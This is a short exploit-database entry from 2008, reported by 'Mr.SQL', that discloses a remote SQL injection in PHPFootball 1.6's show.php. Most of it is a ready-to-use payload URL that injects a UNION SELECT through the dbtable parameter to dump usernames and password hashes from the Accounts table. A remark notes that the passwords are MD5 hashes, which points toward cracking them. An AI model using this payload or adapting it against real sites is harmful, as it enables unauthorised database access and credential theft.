PHPFootball 1.6 (show.php) Remote SQL Injection Vulnerability

2008-07-20T00:00:00
ID 1337DAY-ID-3428
Type zdt
Reporter Mr.SQL
Modified 2008-07-20T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =============================================================
PHPFootball 1.6 (show.php) Remote SQL Injection Vulnerability
=============================================================



###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL injection Vulnerability
##
## PHPFootball 1.6 ( show.php dbtable )
##                            
###############################################################
########################
########################
##
## -[[: Exploite :]]-
##
## www.Target.com/show.php?dbtable=Predictions+UNION+SELECT+0,Concat_Ws(0x3a,Username,Password)MrSQL,0,0,0+FROM+Accounts--
##
########################
########################
 -[: N0TE :]-
1) Download script ;D  http://garr.dl.sourceforge.net/sourceforge/phpfootball/PHPfootball1.6.zip
2) Passwords Md5
 
#######################################################################################################



#  0day.today [2018-03-17]  #